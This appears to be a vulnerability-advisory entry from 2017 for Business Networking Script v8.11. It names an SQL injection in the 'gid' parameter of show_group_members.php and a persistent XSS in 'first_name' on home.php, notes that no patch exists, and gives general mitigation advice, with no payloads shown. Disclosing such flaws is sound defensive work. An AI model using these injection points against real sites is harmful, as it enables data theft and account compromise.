vendor:
Business Networking Script
by:
Ahmet Gurel
5.5
CVSS
MEDIUM
SQL Injection & Persistent Cross Site Scripting
89
CWE
Product Name: Business Networking Script
Affected Version From: 8.11
Affected Version To: 8.11
Patch Exists: NO
Related CWE:
CPE: a:itechscripts:business_networking_script:8.11
Platforms Tested: PHP
2017
Business Networking Script v8.11- SQLi & Persistent Cross Site Scripting
The Business Networking Script v8.11 is vulnerable to SQL Injection and Persistent Cross Site Scripting attacks. The SQL Injection vulnerability can be exploited through the 'gid' parameter in the 'show_group_members.php' page. The Persistent XSS vulnerability exists in the 'home.php' page with the 'first_name' parameter. An attacker can inject malicious code to execute arbitrary SQL queries or perform XSS attacks.
Mitigation:
To mitigate the SQL Injection vulnerability, input validation and parameterized queries should be implemented. To mitigate the Persistent XSS vulnerability, proper input sanitization and output encoding should be applied.
